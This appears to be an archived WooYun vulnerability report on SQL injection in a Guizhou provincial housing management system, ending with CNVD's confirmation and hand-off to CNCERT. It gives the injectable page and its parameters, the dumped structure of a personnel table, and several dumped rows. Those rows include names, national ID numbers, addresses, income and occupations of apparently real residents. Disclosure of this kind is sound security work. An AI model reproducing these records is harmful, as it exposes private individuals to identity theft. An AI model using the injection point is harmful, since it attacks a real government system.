乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-24: 细节已通知厂商并且等待厂商处理中 2015-12-28: 厂商已经确认,细节仅向厂商公开 2016-01-07: 细节向核心白帽子及相关领域专家公开 2016-01-17: 细节向普通白帽子公开 2016-01-27: 细节向实习白帽子公开 2016-02-09: 细节向公众公开
百万来袭,首显万岁!
**.**.**.**/thourseweb/login.aspx
贵州省城建安居房管理信息系统存在sql注射题外话:怎么隐藏地址细节啊注入点
**.**.**.**/thourseweb/country/printpage/gzfprojectmonthdetail.aspx?fprojectid=6d826974-891e-4b36-afd4-22414069acb4&fmonthid=6af53386-5c9f-4156-9bbd-f17850c2968b
人员信息表
人员详细信息字段值
+---------------+----------+| Column | Type |+---------------+----------+| FAddress | varchar | 地址| FBaseInfoId | char || FBirthDay | datetime || FCreateTime | datetime || FIdentityCard | varchar | 身份证| FIncome | decimal | 收入| FIsDeleted | int || FIsLow | varchar || FMemo | nvarchar || FName | varchar | 姓名| FPersonNumber | int || FPersonType | varchar || FSex | varchar || FTime | datetime || FValidBegin | varchar || FValidEnd | varchar || FWorkUnit | varchar |+---------------+----------+
+---------------------+--------------------------------------+---------------------+--------------------+------+-------+-------+--------------------+--------+---------+----------+--------------------+-----------+------------+-------------+--------------------+---------------+| FValidEnd | FBaseInfoId | FValidBegin | FIdentityCard | FSex | FMemo | FName | FTime | FIsLow | FIncome | FAddress | FBirthDay | FWorkUnit | FIsDeleted | FPersonType | FCreateTime | FPersonNumber |+---------------------+--------------------------------------+---------------------+--------------------+------+-------+-------+--------------------+--------+---------+----------+--------------------+-----------+------------+-------------+--------------------+---------------+| NULL | 5F736823-034B-41B0-A218-C8E5DA5ED5B5 | NULL | 520121199807131272 | 男 | NULL | 王贻铄 | 03 20 2010 1:41PM | 是 | 0.00 | NULL | NULL | NULL | 0 | 父子 | NULL | NULL || NULL | DAFBEFB1-8136-4DAE-8BCF-83F9CE83936B | NULL | 52012119890810181X | 、男 | NULL | 何华强 | 06 24 2013 9:49AM | 是 | 0.00 | NULL | NULL | NULL | 0 | 父子 | NULL | NULL || 9999-12-31 23:59:59 | ffffa49d-4a7a-4d81-870e-5f52e30e75ac | 12 31 2008 11:49AM | 线52273019661224173 | 男 | 作废 | 佐正奇 | 12 31 2014 11:53AM | 享受 | 999.00 | 左手坡10-7号 | 12 31 2012 12:00AM | 做小生意 | 0 | 祖孙 | 12 31 2014 10:37AM | 5 |+---------------------+--------------------------------------+---------------------+--------------------+------+-------+-------+--------------------+--------+---------+----------+--------------------+-----------+------------+-------------+--------------------+---------------+
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-12-28 19:04
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给贵州分中心,由贵州分中心后续协调网站管理单位处置。
暂无